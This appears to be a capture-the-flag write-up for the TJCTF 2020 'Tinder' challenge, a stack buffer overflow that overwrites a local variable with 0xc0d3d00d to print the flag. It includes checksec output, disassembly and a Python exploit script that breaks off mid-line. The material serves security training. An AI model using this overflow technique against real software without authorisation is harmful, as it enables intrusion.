Tags: easy pwn binary
Rating:
# TJCTF 2020
## Tinder (binary)
### Solution Summary
Overwrite variable with expected value to get into conditional statement that print the flag.
### Walkthrough
The binary is a 32bits file with NX enabled.
```
$ pwn checksec match
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
```
The program read some user data and the buffer overflow happens at fourth input.
```
$ ./match
Welcome to TJTinder, please register to start matching!
Name: bla
Username: bli
Password: blu
Tinder Bio: lolo <= OVERFLOW HAPPENS HERE
Registered 'bli' to TJTinder successfully!
Searching for matches...
Sorry, no matches found. Try Again!
```
After that, compare a local variable with `0xc0d3d00d`.
```
0x080488e4 <+247>: cmp DWORD PTR [ebp-0xc],0xc0d3d00d
0x080488eb <+254>: jne 0x80489a8 <main+443>
```
If the variable has the expected value, so jump does not happen, the program opens a file and prints the flag.
```
0x08048949 <+348>: call 0x8048570 <fopen@plt>
0x0804894e <+353>: add esp,0x10
0x08048951 <+356>: mov DWORD PTR [ebp-0x10],eax
0x08048954 <+359>: cmp DWORD PTR [ebp-0x10],0x0
0x08048958 <+363>: jne 0x8048976 <main+393>
0x0804895a <+365>: sub esp,0xc
0x0804895d <+368>: lea eax,[ebx-0x1494]
0x08048963 <+374>: push eax
0x08048964 <+375>: call 0x8048520 <puts@plt>
0x08048969 <+380>: add esp,0x10
0x0804896c <+383>: sub esp,0xc
0x0804896f <+386>: push 0x0
0x08048971 <+388>: call 0x8048530 <exit@plt>
```
The offset can be find using a pattern generator and inspecting `ebp-0xc` in a debugger.
### Exploit
```python
import struct
print 'A'*15
print 'A'*15
print 'A'*15
print 'A'*116 + struct.pack('
